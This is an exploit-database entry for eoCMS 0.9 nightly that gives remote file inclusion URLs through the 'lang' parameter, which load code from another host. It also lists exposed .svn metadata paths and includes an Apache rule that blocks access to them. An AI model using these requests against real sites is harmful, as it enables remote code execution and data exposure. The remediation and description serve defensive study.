Lucene search
K

eoCMS 0.9 nightly Mullti Vulnerability

🗓️ 15 Nov 2010 00:00:00Reported by indoushkaType 
zdt
 zdt
🔗 0day.today👁 38 Views

eoCMS 0.9 nightly Multiple Vulnerability, Exploit by indoushk

Code
======================================
eoCMS 0.9 nightly Mullti Vulnerability
======================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor: http://eocms.com/

# Date: 2010-07-27 

# Author : indoushka 

# Inj3ct0r Team http://77.120.101.55/ 

# Thanks to : Dz-Ghost Team

# Contact : http://www.appinsecurity.com

# Tested on : windows SP2 Francais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
-------------
File Inclusion :

http://127.0.0.1/0.9/index.php?lang=http://localhost/c.txt?

http://127.0.0.1/0.9/index.php?adduser=true&lang=http://localhost/c.txt?

SVN repository found :

Vulnerability description:

Subversion metadata directory (.svn) was found in this folder. 
An attacker can extract sensitive information by requesting the hidden metadata directory that popular version control tool Subversion creates. 
The metadata directories are used for development purposes to keep track of development changes to a set of source code before it is committed back to a central repository (and vice-versa). 
When code is rolled to a live server from a repository, it is supposed to be done as an export rather than as a local working copy, and hence this problem.

Affected items :

/0.9/.svn/entries 
/0.9/images/.svn/entries 
/0.9/images/emoticons/.svn/entries 
/0.9/images/news_cats/.svn/entries 
/0.9/js/.svn/entries 
/0.9/js/markitup/.svn/entries 
/0.9/js/markitup/sets/.svn/entries 
/0.9/js/markitup/sets/default/.svn/entries 
/0.9/js/markitup/sets/html/.svn/entries 
/0.9/js/markitup/templates/.svn/entries 
/0.9/search/.svn/entries 
/0.9/themes/.svn/entries 
/0.9/themes/default/.svn/entries 
/0.9/themes/default/images/.svn/entries 

The impact of this vulnerability :

These files may expose sensitive information that may help an malicious user to prepare more advanced attacks.

How to fix this vulnerability :

Remove these files from production systems or restrict access to the .svn directory.
To deny access to all the .svn folders you need to add the following lines in the appropriate context (either global config, 
or vhost/directory, or from .htaccess): 

<Directory ~ "\.svn">
Order allow,deny
Deny from all
</Directory>



#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation